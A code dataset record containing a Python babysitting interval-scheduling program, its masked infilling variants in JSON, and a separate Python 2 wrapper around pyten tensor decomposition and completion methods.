return jobList
def sortInputByEndTimeAndDay(jobList):
"""
Sorts the jobList based on day and then the endTime
:param jobList: list of jobs
:return: jobList in a sorted manner with respect to day and endTime
"""
jobList=sorted(jobList, key= attrgetter('day','endTime'))
return jobList
def divideJobs(jobList, maximum):
"""
Segregates the jobs into list of lists with respect to day, that is jobs done in a particular day is stored in a single index.
:param jobList: sorted jobLists
:param maximum: the maximum amongst the days being considered
:return: segregatedJobs which is a list of lists
"""
    # use an independent list per day ([[0]]*maximum would alias one shared list across days)
    segregatedJobs = [[0] for _ in range(maximum)]
temp=jobList[0].day
j = 0
for i in range(0,len(jobList)):
if jobList[i].day==temp:
segregatedJobs[j].append(jobList[i])
else:
temp = jobList[i].day
j += 1
segregatedJobs[j]=[0,jobList[i]]
return segregatedJobs
def computeRho(segregatedJob):
"""
To compute the Roh value in a list
:param segregatedJob: jobs done in a particular day
:return: rho: list in which computed rho is stored
"""
#inserting 0 at the 1st position
rho = [0]
count = 0
#calculating rho
for i in range(1,len(segregatedJob)):
j = i-1
while(j>0):
if segregatedJob[i].startTime >= segregatedJob[j].endTime:
count += 1
rho.append(j)
break
j=j-1
if count == 0:
rho.append(0)
count = 0
return rho
def algo(segregatedJob):
"""
Implementing the interval scheduling algorithm
:param segregatedJob: A sorted list of jobs of one particular day
:return: None
"""
global total
rho = computeRho(segregatedJob)
    r = len(rho)
S = [[0 for x in range(r)] for y in range(r)]
k = 0
    # implementation of the scheduling algorithm
while(k<len(S)):
for j in range(k, len(S)):
if k == j and j != 0 and segregatedJob[j].noOfChildren < 4:
S[j][k] = max(segregatedJob[j].value + S[rho[j]][k - 1], S[j - 1][k - 1])
elif j > k and j != 0 and segregatedJob[j].noOfChildren >= 4:
S[j][k] = S[j - 1][k]
elif k == j and j != 0 and segregatedJob[j].noOfChildren >= 4:
S[j][k] = max(segregatedJob[j].value + S[rho[j]][rho[k]], S[j - 1][k - 1])
elif j > k and j != 0 and segregatedJob[j].noOfChildren < 4:
S[j][k] = max(segregatedJob[j].value + S[rho[j]][k], S[j - 1][k])
else:
pass
S[k][j] = S[j][k]
k += 1
length = len(S)
    # Add this day's maximum pay (the bottom-right entry of S) to the running total
total += S[length-1][length-1]
def main():
"""
Main function.
return: None
"""
global total
jobList=takeInput()
jobListSorted=sortInputByEndTimeAndDay(jobList)
maximum=jobListSorted[len(jobListSorted)-1].day
segregatedJobs=divideJobs(jobListSorted, maximum)
for i in range (len(segregatedJobs)):
algo(segregatedJobs[i])
# print the total pay
print(int(total))
if __name__ == '__main__':
main()
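# Example input (an assumption about the expected format; one job per line
# after the count: "day startTime endTime noOfChildren hourlyRate", with
# times given as HHMM between 600 and 2300):
#
# 3
# 1 600 900 2 10
# 1 800 1200 5 8
# 2 1000 1400 3 12
#
# For input like this the script prints a single integer: the combined
# maximum pay over all days.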
|
normal
|
{
"blob_id": "f57fa2787934dc2a002f82aa1af1f1d9a7f90da5",
"index": 9947,
"step-1": "<mask token>\n\n\nclass Job:\n \"\"\"\n Job class which stores the attributes of the jobs\n \"\"\"\n\n def __init__(self, day, startTime, endTime, noOfChildren, hourlyRate):\n self.day = day\n self.startTime = startTime\n self.endTime = endTime\n self.noOfChildren = noOfChildren\n self.hourlyRate = hourlyRate\n self.value = (endTime - startTime) / 100 * hourlyRate\n\n def __str__(self):\n return str(self.day) + ' ' + str(self.startTime) + ' ' + str(self.\n endTime) + ' ' + str(self.noOfChildren) + ' ' + str(self.hourlyRate\n ) + ' ' + str(self.value)\n\n\n<mask token>\n\n\ndef takeInput():\n \"\"\"\n Takes input from the console and creates objects and stores in a list jobList\n :return: jobList-list in which input is stored as objects\n \"\"\"\n n = int(input())\n jobList = []\n for i in range(n):\n str = input().strip('\\n').split(' ')\n if int(str[1]) >= 600 and int(str[2]) <= 2300:\n jobs = Job(int(str[0]), int(str[1]), int(str[2]), int(str[3]),\n int(str[4]))\n jobList.append(jobs)\n return jobList\n\n\ndef sortInputByEndTimeAndDay(jobList):\n \"\"\"\n Sorts the jobList based on day and then the endTime\n :param jobList: list of jobs\n :return: jobList in a sorted manner with respect to day and endTime\n \"\"\"\n jobList = sorted(jobList, key=attrgetter('day', 'endTime'))\n return jobList\n\n\ndef divideJobs(jobList, maximum):\n \"\"\"\n Segregates the jobs into list of lists with respect to day, that is jobs done in a particular day is stored in a single index.\n :param jobList: sorted jobLists\n :param maximum: the maximum amongst the days being considered\n :return: segregatedJobs which is a list of lists\n \"\"\"\n segregatedJobs = [[0]] * maximum\n temp = jobList[0].day\n j = 0\n for i in range(0, len(jobList)):\n if jobList[i].day == temp:\n segregatedJobs[j].append(jobList[i])\n else:\n temp = jobList[i].day\n j += 1\n segregatedJobs[j] = [0, jobList[i]]\n return segregatedJobs\n\n\ndef computeRho(segregatedJob):\n \"\"\"\n To compute the Roh value in a list\n :param segregatedJob: jobs done in a particular day\n :return: rho: list in which computed rho is stored\n \"\"\"\n rho = [0]\n count = 0\n for i in range(1, len(segregatedJob)):\n j = i - 1\n while j > 0:\n if segregatedJob[i].startTime >= segregatedJob[j].endTime:\n count += 1\n rho.append(j)\n break\n j = j - 1\n if count == 0:\n rho.append(0)\n count = 0\n return rho\n\n\ndef algo(segregatedJob):\n \"\"\"\n Implementing the interval scheduling algorithm\n :param segregatedJob: A sorted list of jobs of one particular day\n :return: None\n \"\"\"\n global total\n rho = computeRho(segregatedJob)\n r = len(rho)\n S = [[(0) for x in range(r)] for y in range(r)]\n k = 0\n while k < len(S):\n for j in range(k, len(S)):\n if k == j and j != 0 and segregatedJob[j].noOfChildren < 4:\n S[j][k] = max(segregatedJob[j].value + S[rho[j]][k - 1], S[\n j - 1][k - 1])\n elif j > k and j != 0 and segregatedJob[j].noOfChildren >= 4:\n S[j][k] = S[j - 1][k]\n elif k == j and j != 0 and segregatedJob[j].noOfChildren >= 4:\n S[j][k] = max(segregatedJob[j].value + S[rho[j]][rho[k]], S\n [j - 1][k - 1])\n elif j > k and j != 0 and segregatedJob[j].noOfChildren < 4:\n S[j][k] = max(segregatedJob[j].value + S[rho[j]][k], S[j - \n 1][k])\n else:\n pass\n S[k][j] = S[j][k]\n k += 1\n length = len(S)\n total += S[length - 1][length - 1]\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\nclass Job:\n \"\"\"\n Job class which stores the attributes of the jobs\n \"\"\"\n\n def __init__(self, day, startTime, endTime, noOfChildren, hourlyRate):\n self.day = day\n self.startTime = startTime\n self.endTime = endTime\n self.noOfChildren = noOfChildren\n self.hourlyRate = hourlyRate\n self.value = (endTime - startTime) / 100 * hourlyRate\n\n def __str__(self):\n return str(self.day) + ' ' + str(self.startTime) + ' ' + str(self.\n endTime) + ' ' + str(self.noOfChildren) + ' ' + str(self.hourlyRate\n ) + ' ' + str(self.value)\n\n\n<mask token>\n\n\ndef takeInput():\n \"\"\"\n Takes input from the console and creates objects and stores in a list jobList\n :return: jobList-list in which input is stored as objects\n \"\"\"\n n = int(input())\n jobList = []\n for i in range(n):\n str = input().strip('\\n').split(' ')\n if int(str[1]) >= 600 and int(str[2]) <= 2300:\n jobs = Job(int(str[0]), int(str[1]), int(str[2]), int(str[3]),\n int(str[4]))\n jobList.append(jobs)\n return jobList\n\n\ndef sortInputByEndTimeAndDay(jobList):\n \"\"\"\n Sorts the jobList based on day and then the endTime\n :param jobList: list of jobs\n :return: jobList in a sorted manner with respect to day and endTime\n \"\"\"\n jobList = sorted(jobList, key=attrgetter('day', 'endTime'))\n return jobList\n\n\ndef divideJobs(jobList, maximum):\n \"\"\"\n Segregates the jobs into list of lists with respect to day, that is jobs done in a particular day is stored in a single index.\n :param jobList: sorted jobLists\n :param maximum: the maximum amongst the days being considered\n :return: segregatedJobs which is a list of lists\n \"\"\"\n segregatedJobs = [[0]] * maximum\n temp = jobList[0].day\n j = 0\n for i in range(0, len(jobList)):\n if jobList[i].day == temp:\n segregatedJobs[j].append(jobList[i])\n else:\n temp = jobList[i].day\n j += 1\n segregatedJobs[j] = [0, jobList[i]]\n return segregatedJobs\n\n\ndef computeRho(segregatedJob):\n \"\"\"\n To compute the Roh value in a list\n :param segregatedJob: jobs done in a particular day\n :return: rho: list in which computed rho is stored\n \"\"\"\n rho = [0]\n count = 0\n for i in range(1, len(segregatedJob)):\n j = i - 1\n while j > 0:\n if segregatedJob[i].startTime >= segregatedJob[j].endTime:\n count += 1\n rho.append(j)\n break\n j = j - 1\n if count == 0:\n rho.append(0)\n count = 0\n return rho\n\n\ndef algo(segregatedJob):\n \"\"\"\n Implementing the interval scheduling algorithm\n :param segregatedJob: A sorted list of jobs of one particular day\n :return: None\n \"\"\"\n global total\n rho = computeRho(segregatedJob)\n r = len(rho)\n S = [[(0) for x in range(r)] for y in range(r)]\n k = 0\n while k < len(S):\n for j in range(k, len(S)):\n if k == j and j != 0 and segregatedJob[j].noOfChildren < 4:\n S[j][k] = max(segregatedJob[j].value + S[rho[j]][k - 1], S[\n j - 1][k - 1])\n elif j > k and j != 0 and segregatedJob[j].noOfChildren >= 4:\n S[j][k] = S[j - 1][k]\n elif k == j and j != 0 and segregatedJob[j].noOfChildren >= 4:\n S[j][k] = max(segregatedJob[j].value + S[rho[j]][rho[k]], S\n [j - 1][k - 1])\n elif j > k and j != 0 and segregatedJob[j].noOfChildren < 4:\n S[j][k] = max(segregatedJob[j].value + S[rho[j]][k], S[j - \n 1][k])\n else:\n pass\n S[k][j] = S[j][k]\n k += 1\n length = len(S)\n total += S[length - 1][length - 1]\n\n\ndef main():\n \"\"\"\n Main function.\n return: None\n \"\"\"\n global total\n jobList = takeInput()\n jobListSorted = sortInputByEndTimeAndDay(jobList)\n maximum = jobListSorted[len(jobListSorted) 
- 1].day\n segregatedJobs = divideJobs(jobListSorted, maximum)\n for i in range(len(segregatedJobs)):\n algo(segregatedJobs[i])\n print(int(total))\n\n\nif __name__ == '__main__':\n main()\n",
"step-3": "<mask token>\n\n\nclass Job:\n \"\"\"\n Job class which stores the attributes of the jobs\n \"\"\"\n\n def __init__(self, day, startTime, endTime, noOfChildren, hourlyRate):\n self.day = day\n self.startTime = startTime\n self.endTime = endTime\n self.noOfChildren = noOfChildren\n self.hourlyRate = hourlyRate\n self.value = (endTime - startTime) / 100 * hourlyRate\n\n def __str__(self):\n return str(self.day) + ' ' + str(self.startTime) + ' ' + str(self.\n endTime) + ' ' + str(self.noOfChildren) + ' ' + str(self.hourlyRate\n ) + ' ' + str(self.value)\n\n\ntotal = 0\n\n\ndef takeInput():\n \"\"\"\n Takes input from the console and creates objects and stores in a list jobList\n :return: jobList-list in which input is stored as objects\n \"\"\"\n n = int(input())\n jobList = []\n for i in range(n):\n str = input().strip('\\n').split(' ')\n if int(str[1]) >= 600 and int(str[2]) <= 2300:\n jobs = Job(int(str[0]), int(str[1]), int(str[2]), int(str[3]),\n int(str[4]))\n jobList.append(jobs)\n return jobList\n\n\ndef sortInputByEndTimeAndDay(jobList):\n \"\"\"\n Sorts the jobList based on day and then the endTime\n :param jobList: list of jobs\n :return: jobList in a sorted manner with respect to day and endTime\n \"\"\"\n jobList = sorted(jobList, key=attrgetter('day', 'endTime'))\n return jobList\n\n\ndef divideJobs(jobList, maximum):\n \"\"\"\n Segregates the jobs into list of lists with respect to day, that is jobs done in a particular day is stored in a single index.\n :param jobList: sorted jobLists\n :param maximum: the maximum amongst the days being considered\n :return: segregatedJobs which is a list of lists\n \"\"\"\n segregatedJobs = [[0]] * maximum\n temp = jobList[0].day\n j = 0\n for i in range(0, len(jobList)):\n if jobList[i].day == temp:\n segregatedJobs[j].append(jobList[i])\n else:\n temp = jobList[i].day\n j += 1\n segregatedJobs[j] = [0, jobList[i]]\n return segregatedJobs\n\n\ndef computeRho(segregatedJob):\n \"\"\"\n To compute the Roh value in a list\n :param segregatedJob: jobs done in a particular day\n :return: rho: list in which computed rho is stored\n \"\"\"\n rho = [0]\n count = 0\n for i in range(1, len(segregatedJob)):\n j = i - 1\n while j > 0:\n if segregatedJob[i].startTime >= segregatedJob[j].endTime:\n count += 1\n rho.append(j)\n break\n j = j - 1\n if count == 0:\n rho.append(0)\n count = 0\n return rho\n\n\ndef algo(segregatedJob):\n \"\"\"\n Implementing the interval scheduling algorithm\n :param segregatedJob: A sorted list of jobs of one particular day\n :return: None\n \"\"\"\n global total\n rho = computeRho(segregatedJob)\n r = len(rho)\n S = [[(0) for x in range(r)] for y in range(r)]\n k = 0\n while k < len(S):\n for j in range(k, len(S)):\n if k == j and j != 0 and segregatedJob[j].noOfChildren < 4:\n S[j][k] = max(segregatedJob[j].value + S[rho[j]][k - 1], S[\n j - 1][k - 1])\n elif j > k and j != 0 and segregatedJob[j].noOfChildren >= 4:\n S[j][k] = S[j - 1][k]\n elif k == j and j != 0 and segregatedJob[j].noOfChildren >= 4:\n S[j][k] = max(segregatedJob[j].value + S[rho[j]][rho[k]], S\n [j - 1][k - 1])\n elif j > k and j != 0 and segregatedJob[j].noOfChildren < 4:\n S[j][k] = max(segregatedJob[j].value + S[rho[j]][k], S[j - \n 1][k])\n else:\n pass\n S[k][j] = S[j][k]\n k += 1\n length = len(S)\n total += S[length - 1][length - 1]\n\n\ndef main():\n \"\"\"\n Main function.\n return: None\n \"\"\"\n global total\n jobList = takeInput()\n jobListSorted = sortInputByEndTimeAndDay(jobList)\n maximum = jobListSorted[len(jobListSorted) - 
1].day\n segregatedJobs = divideJobs(jobListSorted, maximum)\n for i in range(len(segregatedJobs)):\n algo(segregatedJobs[i])\n print(int(total))\n\n\nif __name__ == '__main__':\n main()\n",
"step-4": "<mask token>\nfrom operator import *\n\n\nclass Job:\n \"\"\"\n Job class which stores the attributes of the jobs\n \"\"\"\n\n def __init__(self, day, startTime, endTime, noOfChildren, hourlyRate):\n self.day = day\n self.startTime = startTime\n self.endTime = endTime\n self.noOfChildren = noOfChildren\n self.hourlyRate = hourlyRate\n self.value = (endTime - startTime) / 100 * hourlyRate\n\n def __str__(self):\n return str(self.day) + ' ' + str(self.startTime) + ' ' + str(self.\n endTime) + ' ' + str(self.noOfChildren) + ' ' + str(self.hourlyRate\n ) + ' ' + str(self.value)\n\n\ntotal = 0\n\n\ndef takeInput():\n \"\"\"\n Takes input from the console and creates objects and stores in a list jobList\n :return: jobList-list in which input is stored as objects\n \"\"\"\n n = int(input())\n jobList = []\n for i in range(n):\n str = input().strip('\\n').split(' ')\n if int(str[1]) >= 600 and int(str[2]) <= 2300:\n jobs = Job(int(str[0]), int(str[1]), int(str[2]), int(str[3]),\n int(str[4]))\n jobList.append(jobs)\n return jobList\n\n\ndef sortInputByEndTimeAndDay(jobList):\n \"\"\"\n Sorts the jobList based on day and then the endTime\n :param jobList: list of jobs\n :return: jobList in a sorted manner with respect to day and endTime\n \"\"\"\n jobList = sorted(jobList, key=attrgetter('day', 'endTime'))\n return jobList\n\n\ndef divideJobs(jobList, maximum):\n \"\"\"\n Segregates the jobs into list of lists with respect to day, that is jobs done in a particular day is stored in a single index.\n :param jobList: sorted jobLists\n :param maximum: the maximum amongst the days being considered\n :return: segregatedJobs which is a list of lists\n \"\"\"\n segregatedJobs = [[0]] * maximum\n temp = jobList[0].day\n j = 0\n for i in range(0, len(jobList)):\n if jobList[i].day == temp:\n segregatedJobs[j].append(jobList[i])\n else:\n temp = jobList[i].day\n j += 1\n segregatedJobs[j] = [0, jobList[i]]\n return segregatedJobs\n\n\ndef computeRho(segregatedJob):\n \"\"\"\n To compute the Roh value in a list\n :param segregatedJob: jobs done in a particular day\n :return: rho: list in which computed rho is stored\n \"\"\"\n rho = [0]\n count = 0\n for i in range(1, len(segregatedJob)):\n j = i - 1\n while j > 0:\n if segregatedJob[i].startTime >= segregatedJob[j].endTime:\n count += 1\n rho.append(j)\n break\n j = j - 1\n if count == 0:\n rho.append(0)\n count = 0\n return rho\n\n\ndef algo(segregatedJob):\n \"\"\"\n Implementing the interval scheduling algorithm\n :param segregatedJob: A sorted list of jobs of one particular day\n :return: None\n \"\"\"\n global total\n rho = computeRho(segregatedJob)\n r = len(rho)\n S = [[(0) for x in range(r)] for y in range(r)]\n k = 0\n while k < len(S):\n for j in range(k, len(S)):\n if k == j and j != 0 and segregatedJob[j].noOfChildren < 4:\n S[j][k] = max(segregatedJob[j].value + S[rho[j]][k - 1], S[\n j - 1][k - 1])\n elif j > k and j != 0 and segregatedJob[j].noOfChildren >= 4:\n S[j][k] = S[j - 1][k]\n elif k == j and j != 0 and segregatedJob[j].noOfChildren >= 4:\n S[j][k] = max(segregatedJob[j].value + S[rho[j]][rho[k]], S\n [j - 1][k - 1])\n elif j > k and j != 0 and segregatedJob[j].noOfChildren < 4:\n S[j][k] = max(segregatedJob[j].value + S[rho[j]][k], S[j - \n 1][k])\n else:\n pass\n S[k][j] = S[j][k]\n k += 1\n length = len(S)\n total += S[length - 1][length - 1]\n\n\ndef main():\n \"\"\"\n Main function.\n return: None\n \"\"\"\n global total\n jobList = takeInput()\n jobListSorted = sortInputByEndTimeAndDay(jobList)\n maximum = 
jobListSorted[len(jobListSorted) - 1].day\n segregatedJobs = divideJobs(jobListSorted, maximum)\n for i in range(len(segregatedJobs)):\n algo(segregatedJobs[i])\n print(int(total))\n\n\nif __name__ == '__main__':\n main()\n",
"step-5": "\"\"\"\nfile: babysit.py\nlanguage: python3\nauthor: [email protected] Parvathi Nair\nauthor: vpb8262 Vishal Bulchandani\n\n\"\"\"\n\"\"\"\nTo compute the maximum pay a brother and sister can earn considering jobs that they can work on\ntogether or separately depending on the number of children to babysit\n\n\"\"\"\nfrom operator import *\n\nclass Job:\n \"\"\"\n Job class which stores the attributes of the jobs\n \"\"\"\n def __init__(self, day, startTime, endTime, noOfChildren, hourlyRate):\n self.day=day\n self.startTime=startTime\n self.endTime=endTime\n self.noOfChildren=noOfChildren\n self.hourlyRate=hourlyRate\n self.value=(endTime-startTime)/100*hourlyRate\n\n def __str__(self):\n return str(self.day)+ \" \" + str(self.startTime) + \" \"+ str(self.endTime) + \" \" +str(self.noOfChildren) + \" \" + str(self.hourlyRate)+ \" \" + str(self.value)\n\n#total is global variable\ntotal = 0\ndef takeInput():\n \"\"\"\n Takes input from the console and creates objects and stores in a list jobList\n :return: jobList-list in which input is stored as objects\n \"\"\"\n n=int(input())\n jobList=[]\n\n #taking n inputs and creating objects\n for i in range (n):\n str = input().strip('\\n').split(\" \")\n if int(str[1])>=600 and int(str[2])<=2300:\n jobs=Job (int(str[0]),int(str[1]),int(str[2]),int(str[3]),int(str[4]))\n jobList.append(jobs)\n return jobList\n\ndef sortInputByEndTimeAndDay(jobList):\n \"\"\"\n Sorts the jobList based on day and then the endTime\n :param jobList: list of jobs\n :return: jobList in a sorted manner with respect to day and endTime\n \"\"\"\n jobList=sorted(jobList, key= attrgetter('day','endTime'))\n return jobList\n\n\ndef divideJobs(jobList, maximum):\n \"\"\"\n Segregates the jobs into list of lists with respect to day, that is jobs done in a particular day is stored in a single index.\n :param jobList: sorted jobLists\n :param maximum: the maximum amongst the days being considered\n :return: segregatedJobs which is a list of lists\n \"\"\"\n\n segregatedJobs=[[0]]*(maximum)\n\n temp=jobList[0].day\n j = 0\n for i in range(0,len(jobList)):\n if jobList[i].day==temp:\n segregatedJobs[j].append(jobList[i])\n\n else:\n temp = jobList[i].day\n j += 1\n segregatedJobs[j]=[0,jobList[i]]\n\n return segregatedJobs\n\ndef computeRho(segregatedJob):\n \"\"\"\n To compute the Roh value in a list\n :param segregatedJob: jobs done in a particular day\n :return: rho: list in which computed rho is stored\n \"\"\"\n\n #inserting 0 at the 1st position\n rho = [0]\n count = 0\n\n #calculating rho\n for i in range(1,len(segregatedJob)):\n j = i-1\n while(j>0):\n if segregatedJob[i].startTime >= segregatedJob[j].endTime:\n count += 1\n rho.append(j)\n break\n j=j-1\n if count == 0:\n rho.append(0)\n count = 0\n\n\n return rho\n\n\ndef algo(segregatedJob):\n \"\"\"\n Implementing the interval scheduling algorithm\n :param segregatedJob: A sorted list of jobs of one particular day\n :return: None\n \"\"\"\n global total\n rho = computeRho(segregatedJob)\n r = len(rho);\n\n S = [[0 for x in range(r)] for y in range(r)]\n k = 0\n #implementaion of scheduling algorithm\n while(k<len(S)):\n for j in range(k, len(S)):\n if k == j and j != 0 and segregatedJob[j].noOfChildren < 4:\n S[j][k] = max(segregatedJob[j].value + S[rho[j]][k - 1], S[j - 1][k - 1])\n\n elif j > k and j != 0 and segregatedJob[j].noOfChildren >= 4:\n S[j][k] = S[j - 1][k]\n\n elif k == j and j != 0 and segregatedJob[j].noOfChildren >= 4:\n S[j][k] = max(segregatedJob[j].value + S[rho[j]][rho[k]], S[j - 1][k - 
1])\n\n elif j > k and j != 0 and segregatedJob[j].noOfChildren < 4:\n S[j][k] = max(segregatedJob[j].value + S[rho[j]][k], S[j - 1][k])\n else:\n pass\n S[k][j] = S[j][k]\n k += 1\n length = len(S)\n\n #Adding the max pay for every individual field in the matrix\n total += S[length-1][length-1]\n\ndef main():\n \"\"\"\n Main function.\n return: None\n \"\"\"\n global total\n jobList=takeInput()\n jobListSorted=sortInputByEndTimeAndDay(jobList)\n maximum=jobListSorted[len(jobListSorted)-1].day\n segregatedJobs=divideJobs(jobListSorted, maximum)\n for i in range (len(segregatedJobs)):\n algo(segregatedJobs[i])\n\n # print the total pay\n print(int(total))\n\nif __name__ == '__main__':\n main()",
"step-ids": [
9,
11,
12,
13,
14
]
}
|
[
9,
11,
12,
13,
14
] |
import pandas as pd
import numpy as np
import pyten.tenclass
import pyten.method
import pyten.tools
def scalable(file_name=None, function_name=None, recover=None, omega=None, r=2, tol=1e-8, maxiter=100, init='random',
printitn=0):
"""
Helios1 API returns CP_ALS, TUCKER_ALS, or NNCP decomposition or Recovery Result
arg can be list, tuple, set, and array with numerical values.
-----------
:param file_name: {Default: None}
:param function_name: Tensor-based Method
:param recover: Input '1' to recover other to decompose.{Default: None}
:param omega: Index Tensor of Obseved Entries
:param r: The rank of the Tensor you want to use for approximation (recover or decompose).{Default: 2}
    :param tol: Tolerance on difference in fit (convergence tolerance for both CP(ALS) and Tucker(ALS)). {Default: 1.0e-8}
    :param maxiter: Maximum number of iterations {Default: 100}
:param init: Initial guess 'random'|'nvecs'|'eigs'. {Default 'random'}
:param printitn: Print fit every n iterations; 0 for no printing.
-----------
:return Ori: Original Tensor
:return full: Full Tensor reconstructed by decomposed matrices
:return Final: Decomposition Results e.g. Ttensor or Ktensor
:return Rec: Recovered Tensor (Completed Tensor)
-----------
"""
# User Interface
if file_name is None:
file_name = raw_input("Please input the file_name of the data: \n")
print("\n")
if function_name is None:
function_name = raw_input("Please choose the method you want to use to recover data(Input one number):\n"
" 1. Distributed CP(ALS) 2.Distributed CP(ADMM) 3. DisTenC 0.Exit \n")
print("\n")
#if recover is None:
# recover = raw_input("If there are missing values in the file? (Input one number)\n"
# "1.Yes, recover it 2.No, just decompose (Missing entries in the original tensor will be replaced by 0) 0.Exit\n")
# Use pandas package to load data
## if file_name[-3:] == 'csv':
# dat1 = pd.read_csv(file_name, delimiter=';')
# Data preprocessing
# First: create Sptensor
# dat = dat1.values
# sha = dat.shape
# subs = dat[:, range(sha[1] - 1)]
# subs = subs - 1
# vals = dat[:, sha[1] - 1]
# vals = vals.reshape(len(vals), 1)
# siz = np.max(subs, 0)
# siz = np.int32(siz + 1)
# X1 = pyten.tenclass.Sptensor(subs, vals, siz)
# Second: create Tensor object and find missing data
# X = X1.totensor()
# Ori = X.data
# lstnan = np.isnan(X.data)
# X.data = np.nan_to_num(X.data)
# Construct omega
#output = 1 # An output indicate flag. (Decompose: 1, Recover:2)
Ori = None
#if type(omega) != np.ndarray:
# # if True in lstnan:
# omega = X.data * 0 + 1
# omega[lstnan] = 0
# if recover == '1':
# output = 2
# Choose method to recover or decompose
if type(function_name) == str:
if function_name == '1' or function_name == 'D_cp_als':
            Dals = pyten.method.TensorDecompositionALS()
            Dals.dir_data = file_name
            Dals.rank = r
            Dals.maxIter = maxiter
            Dals.tol = tol
            Dals.run()
######
Final = Dals.ktensor
Rec = None
full = Final.totensor()
######
elif function_name == '2' or function_name == 'D_ADMM':
            Dadmm = pyten.method.DistTensorADMM()
            Dadmm.dir_data = file_name
            Dadmm.rank = r
            Dadmm.maxIter = maxiter
            Dadmm.tol = tol
            Dadmm.run()
######
Final = Dadmm.ktensor
Rec = None
full = Final.totensor()
######
elif function_name == '3' or function_name == 'D_ADMM_C':
            DadmmC = pyten.method.DistTensorCompletionADMM()
            DadmmC.dir_data = file_name
            DadmmC.rank = r
            DadmmC.maxIter = maxiter
            DadmmC.tol = tol
            DadmmC.run()
######
Final = DadmmC.ktensor
#Rec = Final.totensor().data * omega + X.data * (1 - omega)
full = Final.totensor()
Rec = full
######
elif function_name == '0':
print 'Successfully Exit'
return None, None, None, None
else:
raise ValueError('No Such Method')
else:
raise TypeError('No Such Method')
# Output Result
# [nv, nd] = subs.shape
    if function_name == '1' or function_name == '2':
newsubs = full.tosptensor().subs
tempvals = full.tosptensor().vals
newfilename = file_name[:-4] + '_Decomposite' + file_name[-4:]
#print "\n" + "The original Tensor is: "
#print X1
print "\n" + "The Decomposed Result is: "
print Final
else:
newsubs = Rec.tosptensor().subs
tempvals = Rec.tosptensor().vals
newfilename = file_name[:-4] + '_Recover' + file_name[-4:]
#print "\n" + "The original Tensor is: "
#print Ori
print "\n" + "The Recovered Tensor is: "
print Rec.data
# Return result
return Ori, full, Final, Rec
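# Hypothetical usage sketch (the file name and method choice are placeholders;
# the on-disk layout expected by the distributed pyten methods is not shown in
# this snippet):
#
# Ori, full, Final, Rec = scalable(file_name='tensor.csv', function_name='3',
#                                  r=5, maxiter=200, tol=1e-6)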
|
normal
|
{
"blob_id": "39fdb9c586c3cf92d493269ceac419e0058a763a",
"index": 380,
"step-1": "import pandas as pd\nimport numpy as np\n\nimport pyten.tenclass\nimport pyten.method\nimport pyten.tools\n\n\ndef scalable(file_name=None, function_name=None, recover=None, omega=None, r=2, tol=1e-8, maxiter=100, init='random',\n printitn=0):\n \"\"\"\n Helios1 API returns CP_ALS, TUCKER_ALS, or NNCP decomposition or Recovery Result\n arg can be list, tuple, set, and array with numerical values.\n -----------\n :param file_name: {Default: None}\n :param function_name: Tensor-based Method\n :param recover: Input '1' to recover other to decompose.{Default: None}\n :param omega: Index Tensor of Obseved Entries\n :param r: The rank of the Tensor you want to use for approximation (recover or decompose).{Default: 2}\n :param tol: Tolerance on difference in fit.(Convergence tolerance for both cp(als) or tucker(als).){Default: 1.0e-4}\n :param maxiter: Maximum number of iterations {Default: 50}\n :param init: Initial guess 'random'|'nvecs'|'eigs'. {Default 'random'}\n :param printitn: Print fit every n iterations; 0 for no printing.\n -----------\n :return Ori: Original Tensor\n :return full: Full Tensor reconstructed by decomposed matrices\n :return Final: Decomposition Results e.g. Ttensor or Ktensor\n :return Rec: Recovered Tensor (Completed Tensor)\n -----------\n \"\"\"\n\n # User Interface\n if file_name is None:\n file_name = raw_input(\"Please input the file_name of the data: \\n\")\n print(\"\\n\")\n\n if function_name is None:\n function_name = raw_input(\"Please choose the method you want to use to recover data(Input one number):\\n\"\n \" 1. Distributed CP(ALS) 2.Distributed CP(ADMM) 3. DisTenC 0.Exit \\n\")\n print(\"\\n\")\n #if recover is None:\n # recover = raw_input(\"If there are missing values in the file? (Input one number)\\n\"\n # \"1.Yes, recover it 2.No, just decompose (Missing entries in the original tensor will be replaced by 0) 0.Exit\\n\")\n\n # Use pandas package to load data\n## if file_name[-3:] == 'csv':\n# dat1 = pd.read_csv(file_name, delimiter=';')\n\n # Data preprocessing\n # First: create Sptensor\n# dat = dat1.values\n# sha = dat.shape\n# subs = dat[:, range(sha[1] - 1)]\n# subs = subs - 1\n# vals = dat[:, sha[1] - 1]\n# vals = vals.reshape(len(vals), 1)\n# siz = np.max(subs, 0)\n# siz = np.int32(siz + 1)\n# X1 = pyten.tenclass.Sptensor(subs, vals, siz)\n\n # Second: create Tensor object and find missing data\n# X = X1.totensor()\n# Ori = X.data\n# lstnan = np.isnan(X.data)\n# X.data = np.nan_to_num(X.data)\n\n # Construct omega\n #output = 1 # An output indicate flag. 
(Decompose: 1, Recover:2)\n Ori = None\n #if type(omega) != np.ndarray:\n # # if True in lstnan:\n # omega = X.data * 0 + 1\n # omega[lstnan] = 0\n # if recover == '1':\n # output = 2\n\n # Choose method to recover or decompose\n if type(function_name) == str:\n if function_name == '1' or function_name == 'D_cp_als':\n Dals = pyten.method.TensorDecompositionALS()\n Dals.dir_data = file_name\n Dals.rank = r\n Dals.run()\n Dals.maxIter = maxiter\n Dals.tol = tol\n\n ######\n Final = Dals.ktensor\n Rec = None\n full = Final.totensor()\n ######\n\n elif function_name == '2' or function_name == 'D_ADMM':\n Dadmm = pyten.method.DistTensorADMM()\n Dadmm.dir_data = file_name\n Dadmm.rank = r\n Dadmm.run()\n Dadmm.maxIter = maxiter\n Dadmm.tol = tol\n\n ######\n Final = Dadmm.ktensor\n Rec = None\n full = Final.totensor()\n ######\n\n elif function_name == '3' or function_name == 'D_ADMM_C':\n DadmmC = pyten.method.DistTensorCompletionADMM()\n DadmmC.dir_data = file_name\n DadmmC.rank = r\n DadmmC.run()\n DadmmC.maxIter = maxiter\n DadmmC.tol = tol\n\n ######\n Final = DadmmC.ktensor\n #Rec = Final.totensor().data * omega + X.data * (1 - omega)\n full = Final.totensor()\n Rec = full\n ######\n\n elif function_name == '0':\n print 'Successfully Exit'\n return None, None, None, None\n else:\n raise ValueError('No Such Method')\n\n else:\n raise TypeError('No Such Method')\n\n # Output Result\n # [nv, nd] = subs.shape\n if function_name == 1 or function_name == 2:\n newsubs = full.tosptensor().subs\n tempvals = full.tosptensor().vals\n newfilename = file_name[:-4] + '_Decomposite' + file_name[-4:]\n #print \"\\n\" + \"The original Tensor is: \"\n #print X1\n print \"\\n\" + 